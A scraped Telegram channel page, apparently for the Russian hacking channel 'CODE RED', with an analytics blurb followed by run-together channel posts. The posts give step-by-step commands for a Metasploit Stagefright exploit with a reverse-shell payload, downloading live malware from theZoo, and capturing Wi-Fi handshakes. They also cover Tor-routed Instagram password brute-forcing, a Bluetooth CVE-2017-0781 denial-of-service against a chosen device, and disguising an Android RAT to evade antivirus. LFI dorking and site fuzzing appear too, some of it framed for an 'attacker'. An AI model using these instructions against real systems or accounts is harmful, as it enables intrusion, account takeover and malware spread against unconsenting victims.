CODE RED
Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки. Обратная связь: @encryptedadm
Показати більше📈 Аналітичний огляд Telegram-каналу CODE RED
Канал CODE RED (@coderedcom) у мовному сегменті Російська є активним учасником. На даний момент спільнота об'єднує 10 355 підписників, посідаючи 9 416 місце в категорії Технології та додатки та 61 181 місце у регіоні Росія.
📊 Показники аудиторії та динаміка
З моменту свого створення невідомо, проект продемонстрував стрімке зростання, зібравши аудиторію у 10 355 підписників.
За останніми даними від 03 грудня, 2024, канал демонструє стабільну активність. Хоча за останні 30 днів спостерігається зміна кількості учасників на 0, а за останні 24 години на 0, загальне охоплення залишається високим.
- Статус верифікації: Не верифікований
- Рівень залученості (ER): Середній показник залученості аудиторії становить 0%. Протягом перших 24 годин після публікації контент зазвичай збирає N/A% реакцій від загальної кількості підписників.
- Охоплення публікацій: В середньому кожен допис отримує 0 переглядів. Протягом першої доби публікація в середньому набирає 0 переглядів.
- Реакції та взаємодія: Аудиторія активно підтримує контент: середня кількість реакцій на один пост – 0.
📝 Опис та контентна політика
Автор описує ресурс як майданчик для висловлення суб'єктивної думки:
“Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки.
Обратная связь: @encryptedadm”
Завдяки високій частоті оновлень (останні дані отримано 04 грудня, 2024), канал підтримує актуальність та високий рівень охоплення публікацій. Аналітика показує, що аудиторія активно взаємодіє з контентом, що робить його важливою точкою впливу в категорії Технології та додатки.
exploit/android/browser/stagefright_mp4_tx3g_64bit
Теперь нужно будет последовательно прописать необходимые параметры
SRVHOST <ip>
◽️set URIPATH /
◽️set PAYLOAD linux/armle/mettle/reverse_tcp
◽️set LHOST <ip>
◽️set VERBOSE true
Остается только запустить скрипт
-j
В окне появится ссылка, при переходе по которой откроется сессия для удаленного доступа.git clone https://github.com/ytisf/theZoo
Использование
Запускаем интерфейс командой
python theZoo.py
Далее можно выбрать из базы, к примеру, только ботнеты, прописав
search botnet
Чтобы скачать нужный мальварь вписываем
use <порядковый номер вируса в БД>
Далее просто вводим get и получаем архив с вредоносом и ключи для его расшифровки. В целях безопасности theZoo деактивирует вирусы путем шифрования.
Базу данных можно обновлять командой update-db. Более подробная справка доступна по команде help.git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
Переходим в директорию и запускаем скрипт
◽cd airgeddon/
◽sudo bash airgeddon.sh
В случае наличия на ПК всех необходимых компонентов, Airgeddon предложит выбрать сетевую карту. Обычно она начинается на wlan. Вводим её номер и жмем Enter.
Использование
После запуска откроется главное меню. Управление утилитой в принципе сводится к вводу номера команды. Соответственно для базового перехвата хендшейка сначала нужно перевести карту в режим монитора прописав 2. Далее вводим 5, перейдя в раздел работы с хендшейками.
Выбираем пункт "Explore for targets". Когда целей наберется достаточно нажимаем Ctrl-C. Далее нужно будет выбрать точку доступа только ту, у которой возле номера стоит звездочка, поскольку это означает, что к сети подключены другие пользователи.
Остается выбрать "Capture Handshake" и ввести команду 2. Откроется два окна и после перехвата хендшейка, он появится в одном из них. После нужно будет подтвердить перехват в главном окне с Airgeddon.
Далее можно перейти в главное меню и выбрать там под пунктом 6 оффлайн расшифровку хендшейка. Можно также воспользоваться онлайн ресурсами. Во всяком случае хендшейк перехвачен, без единой команды.git clone https://github.com/thelinuxchoice/instashell
Переходим в директорию и ставим права на исполняемый файл
◽cd instashell
◽chmod +x instashell.sh
Использование
Запускаем сервисы TOR командой
◽service tor start
Запускаем Instashell
◽./instashell.sh
Далее нужно ввести никнейм Instagram аккаунта и словарь паролей для перебора. Словари, в свою очередь, часто генерируются на основе собранной информации о пользователе. Как итог при нахождении подходящего пароля, скрипт остановит свою работу.git clone https://github.com/4shadoww/hakkuframework
Переходим в директорию и запускаем скрипт установки
◽cd hakkuframework/
◽./install
Использование
Запускаем фреймворк командой
◽./hakku
Чтобы получить список модулей, нужно выполнить show modules. С помощью help получаем справку по инструменту. Далее просто выбираем модуль, и также через help читаем, как им пользоваться.apt-get update
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
Далее обновляем pwntools
pip install --upgrade pip
pip install --upgrade pwntools
Устанавливаем библиотеки для работы с Bluetooth
apt-get install bluetooth libbluetooth-dev
pip install pybluez
Скачиваем эксплоит командой
git clone https://github.com/ojasookert/CVE-2017-0781
В скачанном python файле нужно подкорректировать количество пакетов, изменив переменную count до 30000 минимум.
Использование
Сканируем эфир командой
hcitool scan
Выбираем устройство, копируем его MAC адрес и прописываем команду
python CVE-2017-0781.py TARGET=<MAC адрес>
Как итог на атакуемое устройство начнут посылаться запросы, тем самым переполняя буфер, что приведет к ошибкам и отключению службы.git clone https://github.com/sslab-gatech/avpass
Запускаем установщик командой
./install-dep.sh
Использование
Далее нам понадобится сгенерированный билд вируса для Android. Это может быть, к примеру, RAT от AhMyth. Для базовой маскировки остается просто прописать
python gen_disguise.py -i <название файла> individual
Сгенерированный apk файл не детектится большинством антивирусов(разве что одним), а его требования к системе скрыты от пользователя при установке.
#хакингgit clone https://github.com/0x3curity/Samurai
Далее нужно будет установить Lynx командой
◽️apt install lynx
И поставить права на исполняемый файл
◽️chmod +x samurai.sh
Использование
Запускаем программу командой
◽️./samurai.sh
Перед нами появится меню, где можно будет выбрать тип поиска. Вводим соответствующую цифру, к примеру 3. Вводим название компании, и получаем список найденных корпоративных почт.
#OSINT #kaligit clone https://github.com/madRubyroid/LFIFucker.git
Далее нужно будет получить CSE-CX. Для этого нужно перейти по ссылке и добавить новую поисковую систему. В поле "Сайты, на которых выполняется поиск" нужно вписать звездочку и желаемую доменную зону, например: .ru. После сохранения, нужно перейти в Панель управления и скопировать значение из поля "Идентификатор поисковой системы".
Также нужен API-ключ для search engine. Здесь просто переходим в GCloud Console, создаем проект и включаем Custom Search API в разделе "Библиотека API". Далее переходим в "Учетные данные" и берем один из трех API ключей.
Остается только вписать эти две строчки в файл lfi.conf в корневом каталоге LFIFucker.
Использование
Для запуска сканирования по дефолтному шаблону и доркам id= и file= к примеру, нужно вписать команду
◽️./LFIFucker.sh --dork-query id=, file=
Результаты о найденных уязвимых сайтах сохранятся в директорию
tmp. Злоумышленнику останется только подобрать метод и осуществить LFI.
#хакингgit clone https://github.com/Testzero-wz/wscan.git
Переходим в папку и запускаем установщик
◽️cd wscan
◽️python3 -m pip install wscan
Использование
Стандартный фаззинг Wscan запускается в одну строчку
◽️wscan -u "http://www.example.com/" -f -m
Если вписать wscan --help и прочитать справку, можно узнать что вышепредставленная команда сканирует url по словарям, проверяет ссылки и строит карту сайта.
Когда процесс завершится в логах можно будет найти админку сайта, robot.txt, различные JS скрипты и т.д. Злоумышленнику остается только тщательно проанализировать их и в случае нахождения уязвимости начать атаку.
#хакинг #kali